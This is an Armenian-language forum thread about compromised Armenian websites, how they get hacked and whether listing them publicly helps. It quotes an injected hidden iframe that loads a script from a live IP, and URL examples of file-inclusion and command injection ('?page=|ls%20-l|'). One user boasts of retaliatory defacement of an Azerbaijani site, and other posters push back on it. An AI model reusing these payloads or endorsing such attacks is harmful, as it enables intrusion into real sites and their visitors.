Նենգորդների զոհ դարձած հայկական կայքեր

[Tom]

Տենց բան չկա: Մեր հոստինգը կյանքում չի վարակվել, բայց վրայի սայթերը պարբերաբար ու հաճախակի «կոտրել» են: Էդ ծուռ գրած սայթերն են վարկյանական կոտրվում: Որ ֆիրմային սայթ ա պետք գալիս, իսկ իրանք պրոֆեսիոնալ վեբ ծրագրավորողի դիմելու փոխարեն տալիս են մեկի հորքուրի տղուն, որն էլ իր հերթին մի հատ շաբլոն ա քաշում, ու վրեն սայթ հավաքում:
Լավ գրած սայթը չի կոտրվում:

Նախ ասեմ , որ կայքերի վիրուսով վարաքվելը իրենից ներկայացնում է 90% - ով կայքի index կամ այլ կարևոր ֆայլերի օրինակ login.php մեջ ինչ-որ ,HTML , JavaScript կամ այլ կոդի ներդնում օրինակ`

Կոդ:

<iframe src='http://216.227.223.57/pe.php' width='1' height='1' style='visibility:hidden;'></iframe>

, որը աշխատում է այդ էջը կանչելիս , ու ըստ քեզ ոնց կարելի է դա անել եթե նենգորդը չունենա ftp դոստուպ , իսկ ftp դոստուպ ունենալ նշանակումե հոստինգի 21port- ի հետ խաղեր անել կամ user-ի login password-ը ունենալ , որոնցից առաջինը ավելի հեշտ է սխալ ու ոչ պրոֆեսիոնալ նաստռոյկա արաց serveri os-ի վրա անել քան 2-րդը , որովհետև նույնիսք vBulletin - ի նման պռոֆ գրված ֆորումը մի 12 տառանոց login password- ով հանգիստ ջարդումեն նենգորդները ու գրում իրենց կոդերը ֆայլերի մեջ

[NetX]

ու ըստ քեզ ոնց կարելի է դա անել եթե նենգորդը չունենա ftp դոստուպ

օրինակ PHP կամ SQL injection'ներ անելով,
իսկ մասայական վարակումների համար գռվում ա worm, որը վարակում ա կոնկրետ վերսիաների կոնկրետ դվիժոկներ/ֆորումներ կոնկրետ հայտնի ծակեր օգտագործելով...

[Tom]

Մատնացույց ենք անում են կայքերը որ երկար են վարաքված, շաբաթից ավել։ Ու ոչ մի խնդիր դրանում չեմ տեսնում։
Ավելին պետք է նորմալ համակարգ մշակել տենց դեպքերին արձագանքելու համար, ցավոք սրտի մեր CERT-ը չի գործում։

век живи, век учись..
Կկսիսվե՞ս աղբյուրներով որտեղ նշված կլինի որ կաքերի 70%-ից ավելը (համարյա բոլորը դա 95% ավել է, բայց չմանրանանք) գոնե մեկ անգամ «ջարդվել» են։



Տենց դեպքեր իհարկե լինում են, բայց կազմում են փոքրամասնություն ու հազիվ թե 5% գերազանցեն։

Օրինակի համար վերջին մի կես տարվա մեջ, մի 5-6 վարաքված կայքի դեպքով եմ զբաղվել, 4 դեպքում տրոյանները գաղտնաբառեռն էին գողացել, 2 դեպքում էլ գաղտաբառը-գազտնաբառ չեր։ Ինչքան պատշպանված հոսթինգ համակարգ ուզում ես մշակի, ինչքան ոււզում ես պաշտպավնած կայք նախագծի եթե գաղտնաբառը 111, qwerty կամ դոմեյնի անունn է դրա բանը վաղ թե ուշ գալու է, ու ավելի շուտ քան ուշ։

Հետաքրկիր է , որտեղից իմացար թե 4 դեպքում տրոյանները գաղտնաբառեռն էին գողացել , եթե գաղտնիք չի : Մնացածի վերաբերյալ բան չունեմ ասելու , իսկ ինչ մնումե 70% թե 95% , էդ կարևոր չի որովհետև ես ինկատի ունեի այն կայքերի " համարյա բոլորը " որոնք իսկապես նենգորդներին պետքեն , ոչ թե ամեն կայք :

Ավելացվել է 2 րոպե անց

օրինակ PHP կամ SQL injection'ներ անելով,
իսկ մասայական վարակումների համար գռվում ա worm, որը վարակում ա կոնկրետ վերսիաների կոնկրետ դվիժոկներ/ֆորումներ կոնկրետ հայտնի ծակեր օգտագործելով...

Կլինի մի քիչ ավելի մանրամասն ասես եթե կարելի է :

[NetX]

Հետաքրկիր է , որտեղից իմացար թե 4 դեպքում տրոյանները գաղտնաբառեռն էին գողացել:

հնարավոր տարբերակ, երբ ըստ web log'երի ջարդելու հետքեր չկան իսկ FTP լոգերը նայելիս երևում ա որ այլ IP'ից կպել են և փոփոխություններ կատարել

[NetX]

Կլինի մի քիչ ավելի մանրամասն ասես եթե կարելի է :

օրինակ երբ PHP/CGI սկրիպտին փոխանցում ես պարամետր, որը ինքը ֆիլտրացիա չի անում ու կատարում ա, օրինակ՝
շատ պարզ օրինակ
www.aaaaaaaa.am/?page=contacts.htm

www.aaaaaaaa.am/?page=index.php
կարելի է տեսնել index.php source-ը

կամ հնարավոր լինի կատարել հրաման սերվերի վրա
www.aaaaaaaa.am/?page=|ls%20-l|

[Սահակ]

Իսկ ես թեմայի իմաստը չեմ հասկանում... նրա տված օգուտը:
Եթե ուղղակի էստեղ նշում ենք այդ կայքերի մասին, ապա կայքերի տերերին դրանից ի՞նչ օգուտ: Ու ըստ էության դառնում է ինչ որ «ամոթանքի հարթակ»: Չգիտեմ, թեմայի տված օգուտը չեմ տեսնում:

Խնդիրը նրանում չի որ հայկական սայտեր ջարդվում են։ Խնդիրը նրանումա որ ջարդվելուց հետո, սայտի տերերը ամիսներ շարունակ ոչ մի բան չեն անում այդ սայտը մաքրելու համար։

Այս թեման բացեցի նրանից հետո երբ իմացանք որ ԱՄՆ-ում Հայաստանի դեսպանատան սայտում 3 ամսից ավել տրոյան էր դրած, ու սայտի տերերը ոչ մի բան չէին անում։ Այսինքն եթե սայտը ջարդվում է, գոնե սայտի տերերը պետք է սայտը միանգամից օֆֆլայն գցեն, ու սկսեն խնդրի վրա աշխատել, ոչ թե թողեն որ իրանց կայքերի վրա գրված լինի «հաքեդ բայ ազերբայաջան թիմ» ամիսներ շարունակ։

Բայց միգուցե դու ճիշտ ես որ եթե ոչ մեկ սա չի կարդում, սա էնքանել լավ տեղ չի դրա մասին խոսել։ Երևի Xelgen-ի ասած ինչ որ կենտրոնացված համակարգ է պետք այդպիսի դեպքերի համար։ Ինձ հետաքրքիրա մարդիկ ուրիշ ի՞նչ առաջարկներ ունեն։

[Cannibal]

ես ել իմ պատասխանը _http://www . organic . ի ջարդողներին.
աղջիկներին կխնդրեմ չնայել.
ազեները իրանց դրել են եսիմ ինչի տեղ

[Սահակ]

_http://www.elcompany.net/ էլ ջարդեցին։

[Chuk]

Բայց միգուցե դու ճիշտ ես որ եթե ոչ մեկ սա չի կարդում, սա էնքանել լավ տեղ չի դրա մասին խոսել։ Երևի Xelgen-ի ասած ինչ որ կենտրոնացված համակարգ է պետք այդպիսի դեպքերի համար։ Ինձ հետաքրքիրա մարդիկ ուրիշ ի՞նչ առաջարկներ ունեն։

Հենց ամբողջ խնդիրն այն է, որ եթե այս թեմայի արդյունքում կայքերի տերերը կիմանան ինչ է եղել, թեմայում խորհուրդներ կստանան, թե ի՞նչ է կարելի անել և այլն, ապա նորմալ կլինի: Բայց պրակտիկորեն տեսնում ենք, որ տեղադրվում է ջարդված կայքի հասցե, ապա որոշ ժամանակ անց դրվում է, որ կայքն արդեն աշխատում է կամ էլ ոչ, իսկ կայքերի տերերին սրանից օգուտ չկա, օգտագործողներին օգուտ չկա:

Հետևաբար ես մեկ օր էլ կմտածեմ ու բացառված չի, որ թեման կփակեմ:

Ավելացվել է 1 րոպե անց

ես ել իմ պատասխանը _http://www . organic . ի ջարդողներին.
աղջիկներին կխնդրեմ չնայել.
ազեները իրանց դրել են եսիմ ինչի տեղ

Սրա փոխարեն եթե կայքի տերերին տեղեկացնեիր ու եթե կարող ես, խորհուրդներ տայիր, ապա հրաշալի կլիներ: Իսկ նման բանի իմաստ ընդհանրապես չեմ տեսնում:

[Cannibal]

Սրա փոխարեն եթե կայքի տերերին տեղեկացնեիր ու եթե կարող ես, խորհուրդներ տայիր, ապա հրաշալի կլիներ: Իսկ նման բանի իմաստ ընդհանրապես չեմ տեսնում:

իմաստը են ա որ ազեները չիմանան թե մենակ իրանք կարան.
եթե ես ձև շարունակվի կարողա ելի կիբեռպատերազմ սկսվի

[Chuk]

իմաստը են ա որ ազեները չիմանան թե մենակ իրանք կարան.
եթե ես ձև շարունակվի կարողա ելի կիբեռպատերազմ սկսվի

Ու կարո՞ղ ես բացատրել այդ «կիբերպատերազմ» գոռոզահունչ բառի իմաստը: Ի՞նչ ես շահելու, եթե ենթադրենք 1000 հատ ադրբեջանական կայք վարի տաս, իրանք էլ ամեն մեկը 10 րոպե հետո դզեն: Քեզ շատ-շատ մնա քո ասենք ամիսների կամ շաբաթների անիմաստ աշխատանքը, որի փոխարեն կարելի էր հայկական կայքերին օգնել (եթե էդքան ժամանակ ունեք), ամրացնեք, որ չկոտրեն:

[Cannibal]

ես ետ ամեն ինչը անելուց ամենակարևորը՝գիտելիք եմ ստանում.ետա իմ նպատակը մեկ ել միքիչ կայֆ…
եթե տեղյակ չես ասեմ իմացի որ երկու հազար թվի յաները շատ մի հզոր կիբեռպատերազմ ա եղել հայաստանի ու ազերի մեջ ու հայաստանի անունը շատ բարձր ա պահել մի հատ հայ հակերների թիմ անունը չեմ հիշում արդեն…իհարկե հետո ետ թմի անդամները անհայտ կորան …Դ բայց դե զաթո մեր հայ հակերների անունը բարձր պահին
հիմա համարյա լյուբոյ մարդու հետ որ խոսում ես հակինգից,ասում ա խի հայաստանում հակեր կա՞միքիչ անուն ա պետք հանել
դե պարզա ըստեղ հակեր գրելով ինկատի ունեմ լամեռ թեչե ուր ա մեզ բախտ իսկականից հակեր ունենայինք

[Chuk]

Cannibal, անտիհակերներ ունենալուց կուրախանամ, հակերներ ունենալուց՝ հակառակը: Կիբերպատերազմն էլ սկվի, տխուր դեմքով կասեմ «գնացին հավասարվեցին իրանց մարդկային մակարդակին»

[Արտիստ]

ես ետ ամեն ինչը անելուց ամենակարևորը՝գիտելիք եմ ստանում.ետա իմ նպատակը մեկ ել միքիչ կայֆ…

Գիտելիքը կաևոր է, բայց նաև կարևոր թ թե ինչ աղբյուրից ես այն ստանում Իսկ եթե լավ մտածես, միգուցե դրանք ընդամենը ինքնահաստատման փորձեր են

[NetX]

Երևի Xelgen-ի ասած ինչ որ կենտրոնացված համակարգ է պետք այդպիսի դեպքերի համար։ Ինձ հետաքրքիրա մարդիկ ուրիշ ի՞նչ առաջարկներ ունեն։

http://cert.am/
http://cert.am/report_incident.html